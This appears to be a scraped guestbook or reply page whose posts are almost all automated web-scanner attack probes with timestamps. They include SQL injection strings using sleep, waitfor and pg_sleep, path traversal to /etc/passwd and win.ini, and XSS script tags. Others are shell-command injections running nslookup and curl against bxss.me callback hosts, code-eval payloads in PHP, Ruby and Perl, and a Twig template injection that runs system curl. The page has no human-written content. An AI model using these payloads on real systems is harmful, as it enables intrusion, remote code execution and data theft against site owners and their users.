\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727140253

re: guest

WEB-INF/web.xml

1727140254

re: guest

WEB-INF\web.xml

1727140255

re: guest

1

1727140781

re: guest

1

1727140796

re: guest

-1 OR 2+978-978-1=0+0+0+1 --

1727140797

re: guest

-1 OR 3+978-978-1=0+0+0+1 --

1727140797

re: guest

-1 OR 2+482-482-1=0+0+0+1

1727140798

re: guest

-1 OR 3+482-482-1=0+0+0+1

1727140798

re: guest

-1' OR 2+90-90-1=0+0+0+1 --

1727140799

re: guest

-1' OR 3+90-90-1=0+0+0+1 --

1727140799

re: guest

-1' OR 2+55-55-1=0+0+0+1 or 'RX1VANZG'='

1727140800

re: guest

-1' OR 3+55-55-1=0+0+0+1 or 'RX1VANZG'='

1727140800

re: guest

-1" OR 2+793-793-1=0+0+0+1 --

1727140801

re: guest

-1" OR 3+793-793-1=0+0+0+1 --

1727140801

re: guest

if(now()=sysdate(),sleep(15),0)

1727140813

re: guest

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727140826

re: guest

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727140836

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727140846

re: guest

-1; waitfor delay '0:0:15' --

1727140855

re: guest

-1); waitfor delay '0:0:15' --

1727140866

re: guest

1 waitfor delay '0:0:15' --

1727140875

re: guest

Haz4Je7k'; waitfor delay '0:0:15' --

1727140884

re: guest

-5 OR 723=(SELECT 723 FROM PG_SLEEP(15))--

1727140893

re: guest

-5) OR 851=(SELECT 851 FROM PG_SLEEP(15))--

1727140902

re: guest

-1)) OR 231=(SELECT 231 FROM PG_SLEEP(15))--

1727140911

re: guest

dt2M98Qi' OR 903=(SELECT 903 FROM PG_SLEEP(15))--

1727140921

re: guest

8RSC49z7') OR 795=(SELECT 795 FROM PG_SLEEP(15))--

1727140930

re: guest

7coLKXYE')) OR 568=(SELECT 568 FROM PG_SLEEP(15))--

1727140939

re: guest

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727140948

re: guest

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727140958

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1727140970

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1727140980

re: guest

1'"

1727140981

re: guest

@@EbVVx

1727140981

re: guest

1

1727383079

re: guest

1

1727383080

re: guest

1

1727383080

re: guest

1

1727383606

re: guest

1

1727383607

re: guest

1

1727383607

re: guest

17H9GTDTP0

1753894718

re: guest

response.write(9545891*9552781)

1753894722

re: guest

'+response.write(9545891*9552781)+'

1753894723

re: guest

"+response.write(9545891*9552781)+"

1753894724

re: guest


<esi:include src="http://bxss.me/rpb.png"/>

1753894726

re: guest

../../../../../../../../../../../../../../etc/passwd

1753894728

re: guest

../../../../../../../../../../../../../../windows/win.ini

1753894729

re: guest

${9999067+9999909}

1753894730

re: guest

file:///etc/passwd

1753894730

re: guest

../

1753894732

re: guest

redirtest.acx

1753894734

re: guest

)

1753894734

re: guest

!(()&&!|*|*|

1753894735

re: guest

^(#$!@#$)(()))******

1753894736

re: guest

ctime
sleep
p0
(I30
tp1
Rp2
.

1753894737

re: guest

'.gethostbyname(lc('hithw'.'cjcufoxtd2fc2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(85).chr(99).chr(82).'

1753894742

re: guest

".gethostbyname(lc("hitbb"."ebzfiazkc4d2e.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(71).chr(112).chr(87)."

1753894743

re: guest

gethostbyname(lc('hitnh'.'rmivhpvv004ca.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(70).chr(102).chr(80)

1753894744

re: guest

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

1753894745

re: guest

/etc/shells

1753894746

re: guest

echo tfszrb$()\ heepmt\nz^xyu||a #' &echo tfszrb$()\ heepmt\nz^xyu||a #|" &echo tfszrb$()\ heepmt\nz^xyu||a #

1753894746

1753894747

re: guest

../../../../../../../../../../../../../../etc/shells

1753894747

re: guest

bxss.me/t/xss.html?%00

1753894747

re: guest

&echo krjvez$()\ gcpvru\nz^xyu||a #' &echo krjvez$()\ gcpvru\nz^xyu||a #|" &echo krjvez$()\ gcpvru\nz^xyu||a #

1753894747

re: guest

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1753894748

re: guest

c:/windows/win.ini

1753894748

re: guest

|echo kfsttk$()\ adttvv\nz^xyu||a #' |echo kfsttk$()\ adttvv\nz^xyu||a #|" |echo kfsttk$()\ adttvv\nz^xyu||a #

1753894748

re: guest

';print(md5(31337));$a='

1753894749

re: guest

bxss.me

1753894749

re: guest

"+"A".concat(70-3).concat(22*4).concat(112).concat(89).concat(109).concat(85)+(require"socket"
Socket.gethostbyname("hitwb"+"hlmmieby11af5.bxss.me.")[3].to_s)+"

1753894749

re: guest

expr 9000318927 - 926156

1753894749

re: guest

";print(md5(31337));$a="

1753894750

1753894750

re: guest

'+'A'.concat(70-3).concat(22*4).concat(119).concat(78).concat(118).concat(84)+(require'socket'
Socket.gethostbyname('hitqc'+'qjktljksf8f75.bxss.me.')[3].to_s)+'

1753894750

re: guest

(nslookup -q=cname hitzvbnocmsww09fc3.bxss.me||curl hitzvbnocmsww09fc3.bxss.me))

1753894750

re: guest

${@print(md5(31337))}

1753894751

1753894751

re: guest

'A'.concat(70-3).concat(22*4).concat(102).concat(87).concat(104).concat(87)+(require'socket'
Socket.gethostbyname('hitld'+'hmgmdomgf9a07.bxss.me.')[3].to_s)

1753894751

re: guest

$(nslookup -q=cname hittybpzyvuaf69659.bxss.me||curl hittybpzyvuaf69659.bxss.me)

1753894751

re: guest

${@print(md5(31337))}\

1753894752

re: guest

&nslookup -q=cname hitwtlngeusok82b76.bxss.me&'\"`0&nslookup -q=cname hitwtlngeusok82b76.bxss.me&`'

1753894752

re: guest

'.print(md5(31337)).'

1753894753

re: guest

'"()

1753894753

re: guest

&(nslookup -q=cname hitawlkxbiulb64a5a.bxss.me||curl hitawlkxbiulb64a5a.bxss.me)&'\"`0&(nslookup -q=cname hitawlkxbiulb64a5a.bxss.me||curl hitawlkxbiulb64a5a.bxss.me)&`'

1753894753

re: guest

replies

1753894754

re: guest


'&&sleep(27*1000)*isoaze&&'

1753894754

re: guest

|(nslookup -q=cname hitnjniaxtvpa22d2f.bxss.me||curl hitnjniaxtvpa22d2f.bxss.me)

1753894754

re: guest

'"

1753894755

re: guest

replies

1753894755

re: guest


"&&sleep(27*1000)*ukpgcb&&"

1753894755

re: guest

`(nslookup -q=cname hitouteeuxizm69634.bxss.me||curl hitouteeuxizm69634.bxss.me)`

1753894756

re: guest

<!--

1753894756

re: guest

replies/.

1753894756

re: guest


'||sleep(27*1000)*nqtyom||'

1753894756

re: guest

;(nslookup -q=cname hitqlmcdmrykb88822.bxss.me||curl hitqlmcdmrykb88822.bxss.me)|(nslookup -q=cname hitqlmcdmrykb88822.bxss.me||curl hitqlmcdmrykb88822.bxss.me)&(nslookup -q=cname hitqlmcdmrykb88822.bxss.me||curl hitqlmcdmrykb88822.bxss.me)

1753894757

re: guest


"||sleep(27*1000)*nyhdgl||"

1753894757

re: guest

|(nslookup${IFS}-q${IFS}cname${IFS}hituxottuwwnu4deca.bxss.me||curl${IFS}hituxottuwwnu4deca.bxss.me)

1753894758

re: guest

&(nslookup${IFS}-q${IFS}cname${IFS}hitrndvjjwzam5e13e.bxss.me||curl${IFS}hitrndvjjwzam5e13e.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitrndvjjwzam5e13e.bxss.me||curl${IFS}hitrndvjjwzam5e13e.bxss.me)&`'

1753894758

re: guest


'"()&%<zzz><ScRiPt >u4em(9442)</ScRiPt>

1753894763

re: guest

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitbzmhultaov27260.bxss.me")}}

1753894764

re: guest

'"()&%<zzz><ScRiPt >u4em(9297)</ScRiPt>

1753894764

re: guest


9712685

1753894765

re: guest


TFWDpZcr

1753894951

re: guest


*1

1753894957

re: guest


*1

1753894958

re: guest


*1

1753894959

re: guest


*1

1753894960

re: guest

-1 OR 5*5=25 --

1753894960

re: guest

-1 OR 5*5=26 --

1753894961

re: guest

-1 OR 5*5=25

1753894961

re: guest

-1 OR 5*5=26

1753894962

re: guest


*if(now()=sysdate(),sleep(15),0)

1753894968

re: guest


0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z

1753894973

re: guest


0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z

1753894979

re: guest

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1753894985

re: guest


-1; waitfor delay '0:0:15' --

1753894991

re: guest


-1); waitfor delay '0:0:15' --

1753894998

re: guest


-1 waitfor delay '0:0:15' --

1753895004

re: guest


EY5Tt9lU'; waitfor delay '0:0:15' --

1753895010

re: guest


-1 OR 383=(SELECT 383 FROM PG_SLEEP(15))--

1753895015

re: guest


-1) OR 44=(SELECT 44 FROM PG_SLEEP(15))--

1753895021

re: guest


-1)) OR 359=(SELECT 359 FROM PG_SLEEP(15))--

1753895026

re: guest


dVlyY7k1' OR 308=(SELECT 308 FROM PG_SLEEP(15))--

1753895032

re: guest


z192LgtU') OR 431=(SELECT 431 FROM PG_SLEEP(15))--

1753895037

re: guest


VUnrEmOp')) OR 714=(SELECT 714 FROM PG_SLEEP(15))--

1753895043

re: guest


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1753895048

re: guest


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1753895055

re: guest

'||(select 1 from (select pg_sleep(15))x)||'

1753895062

re: guest

''||(select 1 from (select pg_sleep(15))x)||''

1753895066

re: guest


'"

1753895068

re: guest

@@uLN3E

1753895069

re: guest

(select 198766*667891)

1753895070

re: guest

(select 198766*667891 from DUAL)

1753895071